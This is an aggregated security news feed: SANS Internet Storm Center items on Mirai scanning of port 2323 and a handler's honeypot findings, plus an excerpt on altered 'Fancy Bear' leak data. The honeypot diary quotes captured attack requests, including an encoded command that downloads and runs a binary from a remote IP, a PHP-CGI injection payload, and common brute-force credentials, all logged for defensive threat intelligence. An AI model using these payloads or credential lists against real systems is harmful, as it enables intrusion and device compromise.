Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A number of sources, including DShield, have noticed an uptick on port 2323 TCP beginning around 3 weeks ago.

This is the scanner portion of the Mirai botnetscanning for IoT devices on both 23/TCP and 2323/TCP. There are a number of IoT devices that use port 2323/TCP as an alternate port for Telnet. Those who have setup listeners on port 2323 are seeing brute force credential attacks utilizing a small dictionary.

The Miraibotnet iwas used to attempt to DDOSBrian Krebs websiteiand ifor the nearly 1 TbpsDDOS against OVHin late September

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Fake bear dump. (credit: Stewart Butterfield)

A pattern of mischaracterization, misrepresentation, and outright alteration of breached data has emerged in two of the latest headline-grabbing batches of hacked files. Investigators discovered that recently published data from anti-doping testing at the 2016 Olympics in Rio de Janeiro had been altered by parties connected to a Russia-based hacking group behind the breach, according to a report issued by the World Anti-Doping Agency (WADA) yesterday.

The International Olympic Committee (IOC) dump, released by a group calling itself "Fancy Bears," was found by WADA's incident response team to contain altered information. "WADA has determined that not all data released by Fancy Bear (in its PDF documents) accurately reflects [Anti-Doping Administration and Management System (ADAMS)] data," a spokesperson for WADA wrote in a post on the investigation. The attackers gained access by stealing ADAMS credentials through "spear phishing" e-mails sent to IOC officials who owned the accounts. The attack was similar to the e-mails sent to DNC and Clinton campaign officials earlier this year.

This fits into a pattern tied to recent hacks by "Fancy Bear" and other groups—organizations that researchers and government authorities believe are connected in some way to the Russian intelligence community—being used for misinformation. Some of the data in the initial Democratic National Committee "dump" by the entity calling themselves Guccifer 2.0 was revealed to have been altered, and that leaked metadata indicated files had been edited by someone who spoke Russian. While the latest "leak" from Guccifer 2.0 allegedly against the Clinton Foundation's network contains no such smoking guns, the metadata does exist and suggest data came from previous "Fancy Bear" breaches at the DNC and other organizations that used the DNC's network.

Read 2 remaining paragraphs | Comments


A number of the handlers, including myself, run a number of honeypots around the planet. Unfortunately I dont get to play with them as much as I want to. There are a bunch of automated processes in place,but on occasion I have a honeypot day/night where I check how they are doing and to have a look to see what people are up to,aswell as take a look at the executables being pulled.

The main systems I have going at the moment are aSSH honeypot (kippo, soon to be cowrie), and a plain oldweb server. Looking at the last month or so,there are a few interesting things popping up as well as the usual suspects.

The following are the top 10 locations attacking the web server." />

A fairly mixed bunch. The attacks are mostly the general stuff, fairly typical for most organisations that have some sort of web presence. The site is empty so the only things we see are fully automated checks. These are requests like:

  • (checking for file access)PROPFIND /webdav/ HTTP/1.1
  • (exploitation) GET /shell?%63%64%20%2F%74%6D%70%26%26%20%77%67%65%74%20%68%74%74%70%3A%2F%2F%32%32%32%2E%31%38%36%2E%32%31%2E%34%32%3A%33%33%38%39%30%2F%63%62%71%26%26%20%63%68%6D%6F%64%20%2B%78%20%63%62%71%26%26%20%2E%2F%63%62%71
    • which is --cd /tmp wget hxxp://222.186.xx.xx:33890/cbq chmod +x cbq ./cbq (the xx are mine)
  • (admin tool access)GET //phpMyAdmin ..... Various types of requests
  • (scanner)GET /muieblackcat HTTP/1.1
  • (scanning) GET /w00tw00t.at.ISC.SANS.DFind: (no that is not us)
  • (file inclusion)POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
    • which is -- phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n
  • (openProxy Check)CONNECT mx-tw.mail.gm0.yahoodns.net:25

The locations containthe usual suspects (NL, PL CN). SG was a little bit of a surprise, likewise CA, I dont usually get traffic from those spots.

The SSH logs were interesting although I had to make it the top 30. I suspect the pattern is relatively clear. Seems likeNanjingis a busy spot. Ive mentioned in a previous post (about a year ago) that the whole subnet can easily be blocked and your SSH brute forcing attempts will go down significantly. Looks like the subnet is still heavily at it. This pattern is repeated on other honeypots in different regions. " />

On this particular honeypot I allow access when the correct password is provided. the top 10 in this case are as follows:" />

In this case a Russian IP address was the most active, although the actual location for the IP is in Prague (RU provider). They upload one stage which then fetches more nastiness. However, my honeypot doesnt take it that far. The CN locations seem more interested in just guessing passwords and not actually doing much more than that. Most of the actual conenctions are usually from the US, NL and DE (although NL must have been having a few bad months).

On the password and userid front the main user accounts and passwords used were:"> Common users used Common passwords used

  • root
  • admin
  • ubnt
  • support
  • pi
  • user
  • test
  • sshd
  • guest
  • alpine
  • ftpuser
  • oracle
  • raspberry
  • PlcmSpIp
  • admin
  • [email protected]
  • 123456
  • 1234
  • root
  • support
  • password
  • (no password)
  • ubnt
  • 12345
  • 1234567890
  • default
  • alpine
  • 123123
  • raspberry

I also look at the least request, rather than the most requests as those often much more interesting/amusing 007jamesbond, or#$%^$**^(**(654

So how do I use this information?Because the systems serve no real purpose in life all IPs that touch them go into my you are not my friend list which I use as part of threat intel activities. Those IPs automatically go into a list used by a SIEM to check for allowed inbound, or attempted outbound connections. The list also goes into a block list for proxies. The passwords that have been attempted go into a word list, used for password audits or become part of vulnerability scans used to check environments(just use public keys and a strong password please).

The web requests likewise go into a list of requests to be checked inweb server logs. Mainly to see how the web server dealt with the request. Did it send it to a error page?did it try to fulfill the command? what was the resulting status code, etc.

So even though I dont always have the time to go and check them, they are still providing value on a daily basis. If you are considering doing the same, just remember that when running honeypots you have responsibilities. Make sure they cant be used for evil, they are not within your actual infrastructure and you check them regularly to make sure they are still doing what they are supposed to and nothing more.


Mark H

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Internet Storm Center Infocon Status